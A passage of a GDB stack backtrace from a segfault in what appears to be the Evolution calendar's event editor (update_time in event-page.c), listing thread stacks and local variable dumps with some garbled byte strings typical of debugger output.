Ã¡|\bXÃ°Ã¿Â¿\022G\fAÂ¸Ã§\016\tÂ°7\001\tXÃ°Ã¿Â¿Â®Ã´\vAÂ¸Ã§\016\tÃ\t\v\b\001)
at gsignal.c:2195
#20 0x414eeb34 in g_signal_emit (instance=0x1 signal_id=1 detail=1) at
gsignal.c:2239
#21 0x411bf3c7 in gtk_widget_activate (widget=0x90ee7b8) at
gtkwidget.c:3573
#22 0x410c4712 in gtk_menu_shell_activate_item (menu_shell=0x90137b0
menu_item=0x90ee7b8 force_deactivate=1) at gtkmenushell.c:900
#23 0x410c382f in gtk_menu_shell_button_release (widget=0x90137b0
event=0x9103e50) at gtkmenushell.c:527
#24 0x410bb007 in gtk_menu_button_release (widget=0x90137b0 event=0x1)
at gtkmenu.c:2378
#25 0x410b1f85 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80ce960
return_value=0xbffff1d0 n_param_values=2 param_values=0xbffff300 
    invocation_hint=0xbffff1f8 marshal_data=0x410baf70) at
gtkmarshalers.c:82
#26 0x414da857 in g_type_class_meta_marshal (closure=0x80ce960
return_value=0x1 n_param_values=1 param_values=0xbffff300
invocation_hint=0x1 
    marshal_data=0x1) at gclosure.c:514
#27 0x414da4c0 in g_closure_invoke (closure=0x80ce960 return_value=0x1
n_param_values=1 param_values=0x1 invocation_hint=0x1) at
gclosure.c:437
#28 0x414ef2b5 in signal_emit_unlocked_R (node=0x80ce9b8 detail=0
instance=0x90137b0 emission_return=0xbffff2a0
instance_and_params=0xbffff300)
    at gsignal.c:2474
#29 0x414ee60e in g_signal_emit_valist (instance=0x90137b0 signal_id=0
detail=0 var_args=0xbffff490 Â¨Ã´Ã¿Â¿Ã\215\a\bÂ¸Ã´Ã¿Â¿&gt;!\rAÂ¨Ã´Ã¿Â¿)
at gsignal.c:2205
#30 0x414eeb34 in g_signal_emit (instance=0x1 signal_id=1 detail=1) at
gsignal.c:2239
#31 0x411bf1d4 in gtk_widget_event_internal (widget=0x90137b0
event=0x9103e50) at gtkwidget.c:3542
#32 0x410affa9 in gtk_propagate_event (widget=0x90137b0
event=0x9103e50) at gtkmain.c:2344
#33 0x410aeb58 in gtk_main_do_event (event=0x9103e50) at gtkmain.c:1579
#34 0x41406105 in gdk_event_dispatch (source=0x1 callback=0
user_data=0x0) at gdkevents-x11.c:2111
#35 0x4153665d in g_main_dispatch (context=0x80a4b90) at gmain.c:1752
#36 0x41537728 in g_main_context_dispatch (context=0x80a4b90) at
gmain.c:2300
#37 0x41537a60 in g_main_context_iterate (context=0x80a4b90 block=1
dispatch=1 self=0x8076c48) at gmain.c:2381
#38 0x415381c1 in g_main_loop_run (loop=0x80c6290) at gmain.c:2601
#39 0x408412d8 in bonobo_main () at bonobo-main.c:297
#40 0x08065174 in main (argc=1 argv=0xbffff834) at main.c:617
Thread 15 (Thread 344078 (LWP 13777)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbdfff964 in ?? ()
No symbol table info available.
#4  0x40a2ba77 in g_private_get_posix_impl (private_key=0xfffffffc) at
gthread-posix.c:276
No locals.
Thread 14 (Thread 311309 (LWP 13645)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbe1ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 13 (Thread 294924 (LWP 13644)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbe3ff904 in ?? ()
No symbol table info available.
Thread 12 (Thread 278539 (LWP 13643)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbe5ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 11 (Thread 147466 (LWP 13622)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbe7ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 10 (Thread 131081 (LWP 13621)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbe9ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 9 (Thread 213000 (LWP 13628)):
#0  0x401b461a in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x415386a6 in g_main_context_poll (context=0x8210820 timeout=-1
priority=2147483647 fds=0xfffffffc n_fds=9) at gmain.c:2699
        poll_func = 0x401b45a0 
#2  0x415379e0 in g_main_context_iterate (context=0x8210820 block=1
dispatch=1 self=0x8217240) at gmain.c:2376
        got_ownership = -4
        max_priority = 2147483647
        timeout = -1
        some_ready = 9
        nfds = 9
        allocated_nfds = -1
        fds = (GPollFD *) 0x81fc500
#3  0x415381c1 in g_main_loop_run (loop=0x820e610) at gmain.c:2601
        got_ownership = 1073789904
        self = (GThread *) 0x8217240
#4  0x409cab82 in link_io_thread_fn (data=0x0) at linc.c:344
No locals.
#5  0x4154fb67 in g_thread_create_proxy (data=0x8217240) at
gthread.c:601
No locals.
#6  0x41364e31 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x401bd30a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 8 (Thread 98311 (LWP 13619)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbedff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 7 (Thread 81926 (LWP 13618)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbefff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 6 (Thread 65541 (LWP 13617)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf1ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 5 (Thread 49156 (LWP 13616)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf3ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 4 (Thread 196611 (LWP 13627)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf5ff954 in ?? ()
No symbol table info available.
Thread 3 (Thread 16386 (LWP 13614)):
#0  0x413675d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41367398 in __pthread_wait_for_restart_signal () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf7ff904 in ?? ()
No symbol table info available.
#4  0x40215290 in ?? () from /lib/libc.so.6
No symbol table info available.
#5  0x00001000 in ?? ()
No symbol table info available.
Thread 2 (Thread 32769 (LWP 13613)):
#0  0x401b461a in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x41364b30 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
#2  0x401bd30a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 13604)):
#0  0x4018d54b in waitpid () from /lib/libc.so.6
No symbol table info available.
#1  0x405a2d24 in __JCR_LIST__ () from
/lap/gnome/CVS/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0xffffff90 in ?? ()
No symbol table info available.
#3  0x40567b34 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:738
        estatus = 1095730369
        in_segv = 1
        sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} sa_mask
= {__val = {134682972 134682972 1095805840 3221219412 0 
      3221218760 1090809614 24 134944808 1 1093052912 0
1090824976 3221218808 1090825019 151288640 134944808 0 134941792
3221219344 
      134937752 32 1093052912 0 1090824976 3221218872 1091253838
151288640 0 0 134941792 1094088016}} sa_flags = 0 
  sa_restorer = 0x40215290}
        pid = 0
#4  0x08064dd1 in segv_redirect (sig=11) at main.c:483
No locals.
#5  0x4136a7f5 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x41fa6dd0 in update_time (epage=0x9359d38 start_date=0x0
end_date=0xbfffeab8) at event-page.c:318
        priv = (EventPagePrivate *) 0x935a360
        start_tt = (struct icaltimetype *) 0x0
        end_tt = (struct icaltimetype *) 0x0
        implied_tt = {year = 1076561172 month = 0 day = -1073747336 hour =
1076561172 minute = 152062976 second = -1073747272 
  is_utc = -1073747336 is_date = 1076148810 is_daylight = 152063052
zone = 0x40265830}
        start_zone = (icaltimezone *) 0x0
        end_zone = (icaltimezone *) 0x0
        all_day_event = 0
#8  0x41fa7289 in event_page_fill_widgets (page=0x9359d38
comp=0x9104c00) at event-page.c:460
        epage = (EventPage *) 0x9359d38
        priv = (EventPagePrivate *) 0x935a360
        text = {value = 0x0 altrep = 0x0}
        cl = 144432720
        transparency = 1079651620
        start_date = {value = 0x0 tzid = 0x0}
        end_date = {value = 0x0 tzid = 0x0}
        location = 0x0
        categories = 0x414f9231 \201Ãƒ_\031\001
        source = (ESource *) 0xbfffeab8
        l = (GSList *) 0x0
#9  0x41fa251a in comp_editor_page_fill_widgets (page=0x9359d38
comp=0x9104c00) at comp-editor-page.c:245
No locals.
#10 0x41fa0721 in fill_widgets (editor=0x1) at comp-editor.c:1000
        priv = (CompEditorPrivate *) 0x90736a8
        l = (GList *) 0x8f52db0
#11 0x41fa097d in real_edit_comp (editor=0x90034c0 comp=0x87f6f48) at
comp-editor.c:1060
        priv = (CompEditorPrivate *) 0x90736a8
#12 0x41fa5ccc in event_editor_edit_comp (editor=0x90034c0
comp=0x87f6f48) at event-editor.c:271
        ee = (EventEditor *) 0x90034c0
        priv = (EventEditorPrivate *) 0x90541b0
        organizer = {value = 0x402b0514 (\204\t sentby = 0x9104b20 prop
cn = 0x0 language = 0x41f9e84e \201Ãƒ&gt;\004\003}
        client = (ECal *) 0x414f9231
        attendees = (GSList *) 0x0
#13 0x41fa0c0d in comp_editor_edit_comp (editor=0x90034c0
comp=0x87f6f48) at comp-editor.c:1115
        klass = (CompEditorClass *) 0x1
#14 0x41f3fe83 in e_calendar_view_edit_appointment (cal_view=0x90034c0
client=0x87f6f48 icalcomp=0x9b95dc8 meeting=0) at e-cal-view.c:1540
        ee = (EventEditor *) 0x90034c0
        ce = (CompEditor *) 0x90034c0
        uid = 0x1 
        comp = (ECalComponent *) 0x87f6f48
#15 0x41f3edc5 in on_edit_appointment (widget=0x90ee7b8 user_data=0x1)
at e-cal-view.c:989
        event = (ECalendarViewEvent *) 0x1
        selected = (GList *) 0x8fef770
        cal_view = (ECalendarView *) 0x8e3af48
#16 0x414efdd1 in g_cclosure_marshal_VOID__VOID (closure=0x966da58
return_value=0x0 n_param_values=1 param_values=0x1
invocation_hint=0xbfffed78 
    marshal_data=0x0) at gmarshal.c:77
        callback = 0x1
        data1 = 0x90ee7b8
        data2 = 0x1
#17 0x414da4c0 in g_closure_invoke (closure=0x966da58 return_value=0x1
n_param_values=1 param_values=0x1 invocation_hint=0x1) at
gclosure.c:437
        marshal = 0x8052254
        marshal_data = 0x0
        in_marshal = 0
#18 0x414ef875 in signal_emit_unlocked_R (node=0x8229e80 detail=0
instance=0x90ee7b8 emission_return=0x0
instance_and_params=0xbfffee80)
    at gsignal.c:2436
        tmp = (Handler *) 0xbfffed78
        handler = (Handler *) 0x8f98380
        accumulator = (SignalAccumulator *) 0x0
        emission = {next = 0xbffff1f0 instance = 0x90ee7b8 ihint = {signal_id
= 170 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
        handler_list = (Handler *) 0x8f98380
        return_accu = (GValue *) 0x0
        accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong
= 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
        signal_id = 170
        max_sequential_handler_number = 70839
        return_value_altered = 1
#19 0x414ee837 in g_signal_emit_valist (instance=0x90ee7b8
signal_id=170 detail=0 
    var_args=0xbffff00c
\004`\020Ã Ã°Â©&amp;AÂ°7\001\t(Ã°Ã¿Â¿\213\227TAÃ°Â©&amp;A
Ã¡|\bXÃ°Ã¿Â¿\022G\fAÂ¸Ã§\016\tÂ°7\001\tXÃ°Ã¿Â¿Â®Ã´\vAÂ¸Ã§\016\tÃ\t\v\b\001)
at gsignal.c:2195
        _cvalue = (GTypeCValue *) 0xbfffeab8
        _flags = 134850144
        _value_type = 151561616
        _vtable = (GTypeValueTable *) 0x414f9501
        _collect_format = (gchar *) 0xaa 
        _cvalues = {{v_int = 136482888 v_long = 136482888 v_int64 =
4693771119992410184 v_double = 643067.51588869933 v_pointer =
0x8229048} {
    v_int = 1075150948 v_long = 1075150948 v_int64 =
4699186202812973156 v_double = 1498356.2503280872 v_pointer =
0x40158064} {
    v_int = 1096340344 v_long = 1096340344 v_int64 =
588933733564339064 v_double = 2.6796540066592482e-269 v_pointer =
0x4158d378} {
    v_int = -1073746296 v_long = -1073746296 v_int64 =
4707038861170044552 v_double = 4918174.9999958351 v_pointer =
0xbfffee88} {
    v_int = 136948680 v_long = 136948680 v_int64 =
-4611705053585495096 v_double = -1.995773345838403 v_pointer =
0x829abc8} {v_int = 1075925648 
    v_long = 1075925648 v_int64 = 4621065472163533456 v_double =
8.6612567940403835 v_pointer = 0x40215290} {v_int = -1073746304 
    v_long = -1073746304 v_int64 = 4619735133958696576 v_double =
7.1490507125814702 v_pointer = 0xbfffee80} {v_int = 1081429416 
    v_long = 1081429416 v_int64 = 4706450246647238056 v_double =
4369985.007159628 v_pointer = 0x40754da8}}
        _n_values = 150569856
        ptype = 170
        static_scope = 150569856
        instance_and_params = (GValue *) 0xbfffee80
        stack_values = {{g_type = 134955512 data = {{v_int = 151971768 v_uint
= 151971768 v_long = 151971768 v_ulong = 151971768 
        v_int64 = 151971768 v_uint64 = 151971768 v_float =
1.72015819e-33 v_double = 7.5084029706556085e-316 v_pointer =
0x90ee7b8} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 3221221040
data = {{
        v_int = 32 v_uint = 32 v_long = 32 v_ulong = 32 v_int64 =
4706126100089012256 v_uint64 = 4706126100089012256 v_float =
4.48415509e-44 
        v_double = 4131202.0000000149 v_pointer = 0x20} {v_int =
1094094670 v_uint = 1094094670 v_long = 1094094670 v_ulong =
1094094670 
        v_int64 = 4644703975746473806 v_uint64 = 4644703975746473806
v_float = 11.4099865 v_double = 340.8535778170816 v_pointer =
0x41368f4e}}} {
    g_type = 3221221064 data = {{v_int = -1073746256 v_uint =
3221221040 v_long = -1073746256 v_ulong = 3221221040 v_int64 =
579136623229267632 
        v_uint64 = 579136623229267632 v_float = -1.99947166 v_double =
6.0351285451791365e-270 v_pointer = 0xbfffeeb0} {v_int = 60 v_uint =
60 
        v_long = 60 v_ulong = 60 v_int64 = -4611704881923751876
v_uint64 = 13835039191785799740 v_float = 8.40779079e-44 
        v_double = -1.9958114624023571 v_pointer = 0x3c}}} {g_type =
1074858226 data = {{v_int = -1073746128 v_uint = 3221221168 
        v_long = -1073746128 v_ulong = 3221221168 v_int64 =
634884439737888560 v_uint64 = 634884439737888560 v_float =
-1.99948692 
        v_double = 3.058912672184617e-266 v_pointer = 0xbfffef30}
{v_int = 61 v_uint = 61 v_long = 61 v_ulong = 61 v_int64 =
253403070525 
        v_uint64 = 253403070525 v_float = 8.54792063e-44 v_double =
1.2519775169708907e-312 v_pointer = 0x3d}}} {g_type = 136948680 data
= {{
        v_int = -1073746100 v_uint = 3221221196 v_long = -1073746100
v_ulong = 3221221196 v_int64 = -4611704260227240116 
        v_uint64 = 13835039813482311500 v_float = -1.99949026 v_double
= -1.9959495067586941 v_pointer = 0xbfffef4c} {v_int = 1091615154 
        v_uint = 1091615154 v_long = 1091615154 v_ulong = 1091615154
v_int64 = 4699072248757139890 v_uint64 = 4699072248757139890 
        v_float = 9.04533577 v_double = 1471824.2541614589 v_pointer =
0x4110b9b2}}} {g_type = 1094088016 data = {{v_int = 1075925648 
        v_uint = 1075925648 v_long = 1075925648 v_ulong = 1075925648
v_int64 = 4621065472163533456 v_uint64 = 4621065472163533456 
        v_float = 2.52066422 v_double = 8.6612567940403835 v_pointer =
0x40215290} {v_int = -1073746176 v_uint = 3221221120 v_long =
-1073746176 
        v_ulong = 3221221120 v_int64 = 4619735133958696704 v_uint64 =
4619735133958696704 v_float = -1.9994812 v_double =
7.1490507125815839 
        v_pointer = 0xbfffef00}}} {g_type = 1081429416 data = {{v_int
= -1073745968 v_uint = 3221221328 v_long = -1073745968 
        v_ulong = 3221221328 v_int64 = -4611704535105146928 v_uint64 =
13835039538604404688 v_float = -1.999506 v_double =
-1.9958884716024734 
        v_pointer = 0xbfffefd0} {v_int = 1075509428 v_uint =
1075509428 v_long = 1075509428 v_ulong = 1075509428 v_int64 =
138514462900 
        v_uint64 = 138514462900 v_float = 2.42142963 v_double =
6.8435237571041884e-313 v_pointer = 0x401af8b4}}} {g_type =
1080956992 data = {{
        v_int = 3 v_uint = 3 v_long = 3 v_ulong = 3 v_int64 =
-4611703816771862525 v_uint64 = 13835040256937689091 v_float =
4.20389539e-45 
        v_double = -1.9960479736328132 v_pointer = 0x3} {v_int = 32
v_uint = 32 v_long = 32 v_ulong = 32 v_int64 = -2305842455162912736
        v_uint64 = 16140901618546638880 v_float = 4.48415509e-44
v_double = -2.6818914823857405e+154 v_pointer = 0x20}}} {g_type =
134847456 
    data = {{v_int = 1081429416 v_uint = 1081429416 v_long =
1081429416 v_ulong = 1081429416 v_int64 = -4611704399805985368 
        v_uint64 = 13835039673903566248 v_float = 3.83286476 v_double
= -1.9959185140513487 v_pointer = 0x40754da8} {v_int = 1080960095 
        v_uint = 1080960095 v_long = 1080960095 v_ulong = 1080960095
v_int64 = 579136621089006687 v_uint64 = 579136621089006687 
        v_float = 3.72096992 v_double = 6.0351267460562307e-270
v_pointer = 0x406e245f}}} {g_type = 3221221328 data = {{v_int = 32
v_uint = 32 
        v_long = 32 v_ulong = 32 v_int64 = 4616119047447117856
v_uint64 = 4616119047447117856 v_float = 4.48415509e-44 
        v_double = 3.968660354614272 v_pointer = 0x20} {v_int =
134839376 v_uint = 134839376 v_long = 134839376 v_ulong = 134839376
        v_int64 = 4644703974787218512 v_uint64 = 4644703974787218512
v_float = 4.13730665e-34 v_double = 340.85352328973113 
        v_pointer = 0x8097c50}}} {g_type = 3221221240 data = {{v_int =
1080830732 v_uint = 1080830732 v_long = 1080830732 v_ulong =
1080830732 
        v_int64 = 579136621088877324 v_uint64 = 579136621088877324
v_float = 3.69012737 v_double = 6.035126745947487e-270 v_pointer =
0x406c2b0c} 
      {v_int = -1073745968 v_uint = 3221221328 v_long = -1073745968
v_ulong = 3221221328 v_int64 = 140660174800 v_uint64 = 140660174800 
        v_float = -1.999506 v_double = 6.9495360106704632e-313
v_pointer = 0xbfffefd0}}} {g_type = 1080836771 data = {{v_int =
134839376 
        v_uint = 134839376 v_long = 134839376 v_ulong = 134839376
v_int64 = 699624042072210512 v_uint64 = 699624042072210512 
        v_float = 4.13730665e-34 v_double = 6.8481170770277756e-262
v_pointer = 0x8097c50} {v_int = 32 v_uint = 32 v_long = 32 v_ulong =
32 
        v_int64 = 4644703974652379168 v_uint64 = 4644703974652379168
v_float = 4.48415509e-44 v_double = 340.85351562500182 v_pointer =
0x20}}} {
    g_type = 3221221328 data = {{v_int = 134839376 v_uint = 134839376
v_long = 134839376 v_ulong = 134839376 v_int64 = -4611703919716238256
        v_uint64 = 13835040153993313360 v_float = 4.13730665e-34
v_double = -1.9960251153895747 v_pointer = 0x8097c50} {v_int =
1080833683 
        v_uint = 1080833683 v_long = 1080833683 v_ulong = 1080833683
v_int64 = 579130711213880979 v_uint64 = 579130711213880979 
        v_float = 3.69083095 v_double = 6.0301588510275876e-270
v_pointer = 0x406c3693}}} {g_type = 3221221328 data = {{v_int = 32
v_uint = 32 
        v_long = 32 v_ulong = 32 v_int64 = 4706140874776510496
v_uint64 = 4706140874776510496 v_float = 4.48415509e-44 
        v_double = 4138082.0000000149 v_pointer = 0x20} {v_int =
151561232 v_uint = 151561232 v_long = 151561232 v_ulong = 151561232
        v_int64 = 579581235174089744 v_uint64 = 579581235174089744
v_float = 1.64475463e-33 v_double = 6.408873408374109e-270 
        v_pointer = 0x908a410}}} {g_type = 1 data = {{v_int =
1093052912 v_uint = 1093052912 v_long = 1093052912 v_ulong =
1093052912 
        v_int64 = 5600316324489712 v_uint64 = 5600316324489712 v_float
= 10.4164886 v_double = 2.7669239017742856e-308 v_pointer =
0x4126a9f0} {
        v_int = 151971768 v_uint = 151971768 v_long = 151971768
v_ulong = 151971768 v_int64 = -4611703850979629128 
        v_uint64 = 13835040222729922488 v_float = 1.72015819e-33
v_double = -1.9960403779827924 v_pointer = 0x90ee7b8}}} {g_type =
1081429416 
    data = {{v_int = 134839376 v_uint = 134839376 v_long = 134839376
v_ulong = 134839376 v_int64 = 611611726861401168 
        v_uint64 = 611611726861401168 v_float = 4.13730665e-34
v_double = 8.7470443650317504e-268 v_pointer = 0x8097c50} {v_int =
-1073745928 
        v_uint = 3221221368 v_long = -1073745928 v_ulong = 3221221368
v_int64 = 4706140877997731832 v_uint64 = 4706140877997731832 
        v_float = -1.99951077 v_double = 4138083.4999980889 v_pointer
= 0xbfffeff8}}}}
        free_me = (GValue *) 0x0
        signal_return_type = 4
        param_values = (GValue *) 0xbfffee94
        i = 0
        n_params = 0
#20 0x414eeb34 in g_signal_emit (instance=0x1 signal_id=1 detail=1) at
gsignal.c:2239
No locals.
#21 0x411bf3c7 in gtk_widget_activate (widget=0x90ee7b8) at
gtkwidget.c:3573
No locals.
#22 0x410c4712 in gtk_menu_shell_activate_item (menu_shell=0x90137b0
menu_item=0x90ee7b8 force_deactivate=1) at gtkmenushell.c:900
        slist = (GSList *) 0x87ce1a0
        shells = (GSList *) 0x87ce1a0
        deactivate = 142401952
#23 0x410c382f in gtk_menu_shell_button_release (widget=0x90137b0
event=0x9103e50) at gtkmenushell.c:527
        deactivate_immediately = 0
        menu_shell = (GtkMenuShell *) 0x90137b0
        menu_item = (GtkWidget *) 0x90ee7b8
        deactivate = 1
#24 0x410bb007 in gtk_menu_button_release (widget=0x90137b0 event=0x1)
at gtkmenu.c:2378
No locals.
#25 0x410b1f85 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80ce960
return_value=0xbffff1d0 n_param_values=2 param_values=0xbffff300 
    invocation_hint=0xbffff1f8 marshal_data=0x410baf70) at
gtkmarshalers.c:82
        callback = 0x410baf70 
        data1 = 0x90137b0
        data2 = 0x80afc98
        v_return = 1
#26 0x414da857 in g_type_class_meta_marshal (closure=0x80ce960
return_value=0x1 n_param_values=1 param_values=0xbffff300
invocation_hint=0x1 
    marshal_data=0x1) at gclosure.c:514
        class = (GTypeClass *) 0x1
        callback = 0x1
#27 0x414da4c0 in g_closure_invoke (closure=0x80ce960 return_value=0x1
n_param_values=1 param_values=0x1 invocation_hint=0x1) at
gclosure.c:437
        marshal = 0x414da800 
        marshal_data = 0xb4
        in_marshal = 0
#28 0x414ef2b5 in signal_emit_unlocked_R (node=0x80ce9b8 detail=0
instance=0x90137b0 emission_return=0xbffff2a0
instance_and_params=0xbffff300)
    at gsignal.c:2474
        tmp = (Handler *) 0xbffff1f8
        handler = (Handler *) 0x0
        accumulator = (SignalAccumulator *) 0x80ce8a8
        emission = {next = 0x0 instance = 0x90137b0 ihint = {signal_id = 43
detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN 
  chain_type = 134956448}
        handler_list = (Handler *) 0x0
        return_accu = (GValue *) 0xbffff1d0
        accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0
v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
        signal_id = 43
        max_sequential_handler_number = 70839
        return_value_altered = 0
#29 0x414ee60e in g_signal_emit_valist (instance=0x90137b0 signal_id=0
detail=0 var_args=0xbffff490 Â¨Ã´Ã¿Â¿Ã\215\a\bÂ¸Ã´Ã¿Â¿&gt;!\rAÂ¨Ã´Ã¿Â¿)
at gsignal.c:2205
        return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long =
0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
        rtype = 1
        instance_and_params = (GValue *) 0xbffff300
        stack_values = {{g_type = 134956448 data = {{v_int = 151074736 v_uint
= 151074736 v_long = 151074736 v_ulong = 151074736 
        v_int64 = 151074736 v_uint64 = 151074736 v_float =
1.55539943e-33 v_double = 7.464083701213582e-316 v_pointer =
0x90137b0} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0
v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 135062688 data
= {{
        v_int = 152059472 v_uint = 152059472 v_long = 152059472
v_ulong = 152059472 v_int64 = 152059472 v_uint64 = 152059472 
        v_float = 1.73626687e-33 v_double = 7.5127361239958945e-316
v_pointer = 0x9103e50} {v_int = 134217728 v_uint = 134217728 
        v_long = 134217728 v_ulong = 134217728 v_int64 = 134217728
v_uint64 = 134217728 v_float = 3.85185989e-34 
        v_double = 6.631236846766476e-316 v_pointer = 0x8000000}}}
{g_type = 3221222264 data = {{v_int = 1095733809 v_uint = 1095733809
        v_long = 1095733809 v_ulong = 1095733809 v_int64 =
585761865855898161 v_uint64 = 585761865855898161 v_float = 12.9731913
        v_double = 1.6131336159503578e-269 v_pointer = 0x414f9231}
{v_int = 1094945372 v_uint = 1094945372 v_long = 1094945372 
        v_ulong = 1094945372 v_int64 = -4611699864307004836 v_uint64 =
13835044209402546780 v_float = 12.2212791 v_double =
-1.9969255971306188 
        v_pointer = 0x41438a5c}}} {g_type = 1094564418 data = {{v_int
= 152059472 v_uint = 152059472 v_long = 152059472 v_ulong =
152059472 
        v_int64 = 579170189624491600 v_uint64 = 579170189624491600
v_float = 1.73626687e-33 v_double = 6.0633447636973988e-270 
        v_pointer = 0x9103e50} {v_int = -1073745048 v_uint =
3221222248 v_long = -1073745048 v_ulong = 3221222248 v_int64 =
-2305842451941690520 
        v_uint64 = 16140901621767861096 v_float = -1.99961567 v_double
= -2.6818934003861111e+154 v_pointer = 0xbffff368}}} {g_type =
134848568 
    data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 =
578468202837704705 v_uint64 = 578468202837704705 v_float =
1.40129846e-45 
        v_double = 5.4732482567371157e-270 v_pointer = 0x1} {v_int =
1095805840 v_uint = 1095805840 v_long = 1095805840 v_ulong =
1095805840 
        v_int64 = 650952597461576592 v_uint64 = 650952597461576592
v_float = 13.0418854 v_double = 3.8220731049039599e-265 
